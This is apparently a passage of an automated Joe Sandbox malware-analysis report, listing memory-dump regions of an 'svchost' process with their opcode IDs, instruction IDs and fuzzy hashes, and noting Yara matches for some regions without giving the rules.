                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
                                                                              • Instruction ID: c970e9fe573c1af63cd567b5c8aae5e67697c4d564573698d9fe539917759118
                                                                              • Opcode Fuzzy Hash: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
                                                                              • Instruction Fuzzy Hash: AE516E766087429FC716CFA8C884B5AB7E5FBC8344F048A2EFA948B344D734E905CB52
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0ddd4e82306d5514fffa1f1b30874c7f09d1d458be5fe5861797eb9008640ed2
                                                                              • Instruction ID: 68c30fc4fea65421fdc3a0ea6b39f371216c27a6d816228f390c1ece2cd57697
                                                                              • Opcode Fuzzy Hash: 0ddd4e82306d5514fffa1f1b30874c7f09d1d458be5fe5861797eb9008640ed2
                                                                              • Instruction Fuzzy Hash: 59510531A00219AFCB14DFA9C944A7EFBB9FF48384F08416AFA05D7250DB75AE11CB80
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5fba3cbec30ef7f11953d733d1d9ba3a645fb0fbc9e6201e0af211e94a61101e
                                                                              • Instruction ID: 42f7cc77a01b81686140aafccc28d2ad0fda692e3a207240d397009c148d56b2
                                                                              • Opcode Fuzzy Hash: 5fba3cbec30ef7f11953d733d1d9ba3a645fb0fbc9e6201e0af211e94a61101e
                                                                              • Instruction Fuzzy Hash: 0B518975E05314DFEF25DBA9C940BADB7B8AF0B358F18006BF811EB240D7B498408B52
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: abe8939629acf6f74f1629921e0e57b513a28d699f55ced77cb34f2c58e4a753
                                                                              • Instruction ID: 9a282a144b54202e5bd0a708d7673d338cd7a61dfa54191f7d7ba09c24769ee9
                                                                              • Opcode Fuzzy Hash: abe8939629acf6f74f1629921e0e57b513a28d699f55ced77cb34f2c58e4a753
                                                                              • Instruction Fuzzy Hash: 8741947AD05229AFDF11EBA8D984ABFB6BCAF05654F05016BE900FB700D634DE4187E4
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a13fe27dc36b64178cbd73f66f4d810b6ea9621728028c8166da154b9894bd6d
                                                                              • Instruction ID: cd74ec1f834fef3c3153543b04f7eb664e192176b9a14b5f8926dfacb357e63b
                                                                              • Opcode Fuzzy Hash: a13fe27dc36b64178cbd73f66f4d810b6ea9621728028c8166da154b9894bd6d
                                                                              • Instruction Fuzzy Hash: BD41AD369042149BCB14DFA8C440AEEF7B8BF88610F18816FE916EB340D7359C81CBA4
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                              • Instruction ID: afcfc4699c94579a887cca113cd85968202e1e51533d46946c1a901978bf4a17
                                                                              • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                              • Instruction Fuzzy Hash: 96512B76A00615DFCB15CF58C580AAEF7F6FF84710F2885AAD855A7350D734AE81CB90
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                                                                              • Instruction ID: e9a6f7041004389dff19125b2f7aa8799e1f285cd93d13f3fbc6f5400b0d7e94
                                                                              • Opcode Fuzzy Hash: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                                                                              • Instruction Fuzzy Hash: C4512776A00606DFCB18CF68C4916AAFBF1FF48314B18856ED859A7745E734EA90CF90
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2387cf2c5b78db35841b9efe40dfae152d7dbb73d2704d80f96d98a73893a910
                                                                              • Instruction ID: 236daf51bb0c6ae78cf5fd7eb0101e8232631da74c31a31768f8dc81931cecfd
                                                                              • Opcode Fuzzy Hash: 2387cf2c5b78db35841b9efe40dfae152d7dbb73d2704d80f96d98a73893a910
                                                                              • Instruction Fuzzy Hash: 2E51F870904216EBDB29DB64CD44BE8BBB5EF02314F1842EBE429AB7D1E7785981CF40
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ef7d1b605d209e038ae8b93e532e6e9b02191fd236c340c03f71a01e6055b314
                                                                              • Instruction ID: 71ee399c0f34915b535935543d96d3c8e727deaaaf8301294af87332d382f584
                                                                              • Opcode Fuzzy Hash: ef7d1b605d209e038ae8b93e532e6e9b02191fd236c340c03f71a01e6055b314
                                                                              • Instruction Fuzzy Hash: 8341AC75640311EFDB25EF68CA80B6ABBB8EF50794F04446BE9559B690E774D800CFA0
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5e82f068e2f2f586f48d6c844784d22b7a51cb523507a4506aa1bcade9f7315d
                                                                              • Instruction ID: 64411042a8576488a333d1fa877dbe426e3e01269785eec26aed22b9841dbab5
                                                                              • Opcode Fuzzy Hash: 5e82f068e2f2f586f48d6c844784d22b7a51cb523507a4506aa1bcade9f7315d
                                                                              • Instruction Fuzzy Hash: B741D0712083418FD708CF65D8A497ABBE1EBD4315F088A5EF9D58B382C730D909CB61
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 48c74ee4c5d5cec4b37b7ae190121a5aa55c03bc0b6d38ced6f1a9704ab9af32
                                                                              • Instruction ID: 22a007878fb60635cccdfec5176d69b7744f50f8e29c92b4d960d46df4404588
                                                                              • Opcode Fuzzy Hash: 48c74ee4c5d5cec4b37b7ae190121a5aa55c03bc0b6d38ced6f1a9704ab9af32
                                                                              • Instruction Fuzzy Hash: 0541F330A182959FCB14DF29C495ABAFBF1FF49304F09849EE4C68F245C739A456DBA0
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 557f067e558d842146512f298a608c81dcb2e9df9331c59b11733928417bc36b
                                                                              • Instruction ID: 96665835fd596636859ec5ef78f3c4ef373738e8a1d8b4dfa067c19582c2ddd9
                                                                              • Opcode Fuzzy Hash: 557f067e558d842146512f298a608c81dcb2e9df9331c59b11733928417bc36b
                                                                              • Instruction Fuzzy Hash: C041B17A6043009FD734EF25CA90F6AB7E8EB55325F04062FF9159B791DB30A841CB91
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                              • Instruction ID: 85605252fdda36095df2e9976601e6e6b09bb849c7cbac62f9e63c5e19e2bf0c
                                                                              • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                              • Instruction Fuzzy Hash: E9411831A08225DFDB24EFA985507BAFB72EB90754F19806FE9459B340DA35DD80CBA0
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                              • Instruction ID: 156c34da78cfa37cd22670eaf5e2b5fe98b70a5d4b7a42969d9e23d2a21a96d1
                                                                              • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                              • Instruction Fuzzy Hash: 85412E75A04705EFDB24CFA9C980AAAB7F8FF19700B10496EE556DB690D730EA84CF50
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e0cb7fe9442b40dcd26970f5b1be242c54c9567b217bbdc7f8f4ae0b29bdfe9a
                                                                              • Instruction ID: 615f5e7d0505f0bed8799da86aaec5dcd9c9417d71e83394ee427c0df1ec41e0
                                                                              • Opcode Fuzzy Hash: e0cb7fe9442b40dcd26970f5b1be242c54c9567b217bbdc7f8f4ae0b29bdfe9a
                                                                              • Instruction Fuzzy Hash: 4341EE75901714CFCB21EF28DA40B69B7B5FF86314F148AAFE4169B7A0EB309941CB40
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6c99b14e06c4aaadc6873958652cedf5628644bc831ec42239f22f5d7dee6f27
                                                                              • Instruction ID: 5eaa930af206372ec4c1c91922ee5680cba4040d3b7b44f758a32d8076ba939c
                                                                              • Opcode Fuzzy Hash: 6c99b14e06c4aaadc6873958652cedf5628644bc831ec42239f22f5d7dee6f27
                                                                              • Instruction Fuzzy Hash: 6F413831A042595BD740DB2685A0ABABFF1EF85209F0CC1FAD8C1DB286E639C506C770
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ee9f20dfa75fcb94340cb645a87c0e383c330c020f1aa502f44ae28e523721a0
                                                                              • Instruction ID: dab232aaa158c20a5d6b7e951c0925530377887a9f5b6434fa6a72b5a524b4a8
                                                                              • Opcode Fuzzy Hash: ee9f20dfa75fcb94340cb645a87c0e383c330c020f1aa502f44ae28e523721a0
                                                                              • Instruction Fuzzy Hash: EA417C76508304AFD320EF69C945B9BBBE8FF88664F004A2FF998D7251D7709905CB92
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 07f1b816e10b4df0c9ca3f7891afbf7c3364f832b540bc2d0d44f92a33f6ff88
                                                                              • Instruction ID: 7f0f85ee54c370ddac50931d314be29eeb5bf6057356eb64217508eb3eafa56f
                                                                              • Opcode Fuzzy Hash: 07f1b816e10b4df0c9ca3f7891afbf7c3364f832b540bc2d0d44f92a33f6ff88
                                                                              • Instruction Fuzzy Hash: 803159367001069FC718DF69CC44AA3BBA9EF84710F08867AFA18CB385E774D945C390
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: db51585a54c2106c8cea4439f873848eaa7a3c032944ca4384e6e1da048bfa08
                                                                              • Instruction ID: 895409a17e050800ff0593ef7eca4f004c4270f221cf4b06a4151439ddee1234
                                                                              • Opcode Fuzzy Hash: db51585a54c2106c8cea4439f873848eaa7a3c032944ca4384e6e1da048bfa08
                                                                              • Instruction Fuzzy Hash: 5A418433E0412A8FCB18DF68D59197AF7F5FB4830475642BEE905AB294DB34AE05CB90
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 99df16872ca346521ff76e8fd0c288bf1e648b919504b48b970d90989db0cb42
                                                                              • Instruction ID: 70f1bd8bc3b8287fa12f6188ef22cde2e920661b248cb4387545c364394762ba
                                                                              • Opcode Fuzzy Hash: 99df16872ca346521ff76e8fd0c288bf1e648b919504b48b970d90989db0cb42
                                                                              • Instruction Fuzzy Hash: C631F436610115AFD714DFA9CD48AABBBF5EF88354F44857AFA08CF244D634E902C790
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655581470.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                                                              • Instruction ID: b220e7cc2b21b91a0a46edb43cf08ba8952aa894711fd27decb0b2e0fdf70c5b
                                                                              • Opcode Fuzzy Hash: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                                                              • Instruction Fuzzy Hash: 4F3193116586F10DD30E836E08BD675AEC18E9720174EC2FEDADA6F2F3C0888418D3A5
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                              • Instruction ID: 91c37f0ba8076008ccebf34710c73a99192e1493555dc1f27d2b366501c43c9f
                                                                              • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                              • Instruction Fuzzy Hash: C9310732A04244AFDB21DB68CC44B9AFFF9FF45350F0885ABE855DB351D674A844CBA0
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b20980e25f55a32faa56c6de298ff1685e3a4589dd3fd19363150c15c00d0785
                                                                              • Instruction ID: c1a608a8e716a2defa4559a10c55687a07381f7245e1b33901e01bf14dec8919
                                                                              • Opcode Fuzzy Hash: b20980e25f55a32faa56c6de298ff1685e3a4589dd3fd19363150c15c00d0785
                                                                              • Instruction Fuzzy Hash: DC314275A00328EFDB21DB24CD40B9BB7B9AF85760F55019EB94DAB380DB309E448B51
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 85b1584032fba150422f2ef6af11059dc0812b7c552f82e51ddfbf8546a1b94e
                                                                              • Instruction ID: caf1a03fe6c60628a0dd6fc9f079145a43c22c04453db36417d2087b7fbf7f56
                                                                              • Opcode Fuzzy Hash: 85b1584032fba150422f2ef6af11059dc0812b7c552f82e51ddfbf8546a1b94e
                                                                              • Instruction Fuzzy Hash: B131CE35701A02FFDB55DB28CA80A99FBA9BF46354F04456BE8019BB50DB70E820CBD0
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d094bcd91e6f5b04b4608259ca810b4c4d3347fedabf7c6c4b16d72ee756281a
                                                                              • Instruction ID: 7c6777e45114ee2b259e7384b5f4b27839a0686d70650b4eff9e356f0f0f83d7
                                                                              • Opcode Fuzzy Hash: d094bcd91e6f5b04b4608259ca810b4c4d3347fedabf7c6c4b16d72ee756281a
                                                                              • Instruction Fuzzy Hash: 9C41AF75100B449FDB26CF29C981BD6BBE9AB4A354F04442FF6999F650C774E804CB50
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                                                              • Instruction ID: f51081b46c23124f23162288773496e556541b234bf98df6a3c0a99c3cdb2721
                                                                              • Opcode Fuzzy Hash: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                                                              • Instruction Fuzzy Hash: A631D431A083419BEB21EB28C800767BAE5BF86754F0C856FFD868B381D274D841C7A2
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a348b358dc08d9d8c7de24184ab9d6e1d3c38354b5f8742a355c3e05f5e97f6b
                                                                              • Instruction ID: 297e22d965ddef2e6cdf14a63723d190725b401a867a90b1fb916ccdd228f55d
                                                                              • Opcode Fuzzy Hash: a348b358dc08d9d8c7de24184ab9d6e1d3c38354b5f8742a355c3e05f5e97f6b
                                                                              • Instruction Fuzzy Hash: 9331A176E00215EFDB19DF98CD80BAEB7B9EB48740F49416AF500AB254D774ED01CB94
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c8d9305d39b6f576c26170394a0df4607d0ef141741020f24c5b9962ed265b3d
                                                                              • Instruction ID: 441ad80234f9b85874db4fddd785552d8e70c6a0a34f7ed4df09092a6c3b1ad2
                                                                              • Opcode Fuzzy Hash: c8d9305d39b6f576c26170394a0df4607d0ef141741020f24c5b9962ed265b3d
                                                                              • Instruction Fuzzy Hash: 39316D316002049FCB24DF6AD9C5A5B7BF4FF49344F8585AAF908DF249D270E945CBA4
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: bd8fefc32f358eee74250669a6c2a53541df8e2ff009ff38f824f3f7a0eb921c
                                                                              • Instruction ID: 5d4d80e6c21f5fba64785222863cb5c12074057b723899b21c9226861e9434ac
                                                                              • Opcode Fuzzy Hash: bd8fefc32f358eee74250669a6c2a53541df8e2ff009ff38f824f3f7a0eb921c
• Instruction Fuzzy Hash: 2B31E235B00215AFDB22EBA9CD40B6EBBB9AB84354F0445BAF645DB361DA30DD008B94

Memory Dump Source
• Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e5d71fa833a8d1c85d93ce40ea508961437422530057e66c6a80456ce13a7350
• Instruction ID: 5136f9f8b664ba176c1beb75b89ca9d0b0bdac83ff35c779946e7b4587a3bd15
• Opcode Fuzzy Hash: e5d71fa833a8d1c85d93ce40ea508961437422530057e66c6a80456ce13a7350
• Instruction Fuzzy Hash: DE31A076A04751DBC711EF28C980E6BBBA5EF86760F05496BFC569B310DA30DC1187E1

Memory Dump Source
• Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
• Instruction ID: eb43a35771edbffaabd0076309aedc849f8faa4c50c487ebd9d563ab6e2ac006
• Opcode Fuzzy Hash: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
• Instruction Fuzzy Hash: 1931E336A00A24AFDB21DF5CC980B2ABBB9DB81710F1D846FED259B242D338DD40CB50

Memory Dump Source
• Source File: 00000002.00000002.2655581470.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_svchost.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4eeb8354fe9e35b752ebb0e14636a36a251eaa19bdd11e70c9861eb1d2ff161f
• Instruction ID: 5182746938f5bc1cb33c47248a9c10272ee5e5bee51c19b49db2c260a0882b41
• Opcode Fuzzy Hash: 4eeb8354fe9e35b752ebb0e14636a36a251eaa19bdd11e70c9861eb1d2ff161f
• Instruction Fuzzy Hash: BD31E372B106266BD354CE3AD880656F7E6FB88310B95863AD918C3B80E774F961C7D4

Memory Dump Source
• Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3f857d78d7158342fd077451c557b50127f55c0307c9fc97317628e47e034ca1
• Instruction ID: 70ea2c1dc56c1e3ad4a3de7320778ec72efa835459b3db9d7361008fcc8a7484
• Opcode Fuzzy Hash: 3f857d78d7158342fd077451c557b50127f55c0307c9fc97317628e47e034ca1
• Instruction Fuzzy Hash: 66318339B15A05FFDB51DB24DA40A59BBA5FF46354F4490ABE9018BB50D731E831CBC0

Memory Dump Source
• Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
• Instruction ID: 44fd35d0e12f29d0f4970963481795f8dd9f28c962e129b4cbbeb5da9d8c92c8
• Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
• Instruction Fuzzy Hash: 033128B2B00B00AFD760CF69DE41B57B7F8AB09A50F08092EA59AD3650E730E900CB64

Memory Dump Source
• Source File: 00000002.00000002.2655581470.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_svchost.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 45a800a4a171d570def4212989f71f5cbb68d8cfe5dba5bd1d5a4888de5d8b4a
• Instruction ID: 6ae0b5017d348af5fb59412a67a9ca8fc38f259dc942650c7cbe58ce921f0122
• Opcode Fuzzy Hash: 45a800a4a171d570def4212989f71f5cbb68d8cfe5dba5bd1d5a4888de5d8b4a
• Instruction Fuzzy Hash: 2C31B172A10A108FD368CE6ED945657F7E1EF88340B45866EE959D7780DAB8EC01CB84

Memory Dump Source
• Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 663a37088795cf2c3b3e837922d66265ba1aeb4edf4038e2b67683f210b208fc
• Instruction ID: 9c84c3cef76a2a9b52a5f8459333ef394efc3a95333ed19f0e86abd975400cbe
• Opcode Fuzzy Hash: 663a37088795cf2c3b3e837922d66265ba1aeb4edf4038e2b67683f210b208fc
